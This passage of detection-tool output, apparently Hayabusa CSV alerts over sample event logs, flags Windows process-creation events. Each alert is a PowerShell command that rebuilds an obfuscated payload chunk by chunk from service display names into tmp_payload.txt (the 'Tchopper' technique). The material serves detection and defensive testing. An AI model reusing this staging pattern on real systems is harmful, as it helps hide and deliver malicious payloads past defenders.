payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:46.053 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:47.505 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg220"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x308 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:47.505 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg220"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc30 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:47.505 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:48.943 +00:00,FS03.offsec.lan,4688,low,,Suspicious 
Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg221"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xdd0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:48.959 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg221"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x964 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:48.959 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:50.402 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg222"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe18 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or 
Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:50.402 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg222"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x660 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:50.402 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:51.840 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg223"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3d8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:51.855 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg223"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x3cc | User: FS03$ | LID: 
0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:51.855 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:53.299 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg224"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe4c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:53.299 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg224"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x7ec | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:53.299 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive 
PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:54.755 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg225"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x4a8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:54.755 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg225"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa14 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:54.755 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:56.197 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg226"" | select 
-Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x618 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:56.213 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg226"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x750 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:56.213 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:57.679 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg227"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd48 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:57.679 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd 
Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg227"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xac8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:57.679 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:59.127 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg228"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc74 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:59.127 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg228"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x490 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated 
payload transfer via service name - Tchopper.evtx +2021-11-03 08:39:59.127 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:40:00.581 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg229"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xacc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:40:00.581 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg229"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xff4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:40:00.581 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:40:02.034 +00:00,FS03.offsec.lan,4688,low,,Suspicious 
Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg230"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc94 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:40:02.050 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg230"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc10 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:40:02.050 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:40:03.487 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg231"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc64 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or 
Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:40:03.503 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg231"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf78 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:40:03.503 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:40:04.941 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg232"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd14 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:40:04.941 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg232"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf3c | User: FS03$ | LID: 
0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:40:04.941 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:40:06.381 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg233"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xdb0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:40:06.381 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg233"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc30 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:40:06.381 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive 
PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:40:07.834 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg234"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xfb0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:40:07.834 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg234"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x38c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:40:07.834 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:40:09.316 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg235"" | select 
-Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe7c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:40:09.331 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg235"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xbac | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:40:09.331 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:40:10.768 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg236"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xdcc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:40:10.768 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd 
Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg236"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe58 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:40:10.768 +00:00,FS03.offsec.lan,4688,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation_builtin/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:40:12.215 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg237"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x888 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx +2021-11-03 08:40:12.215 +00:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg237"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x394 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated 
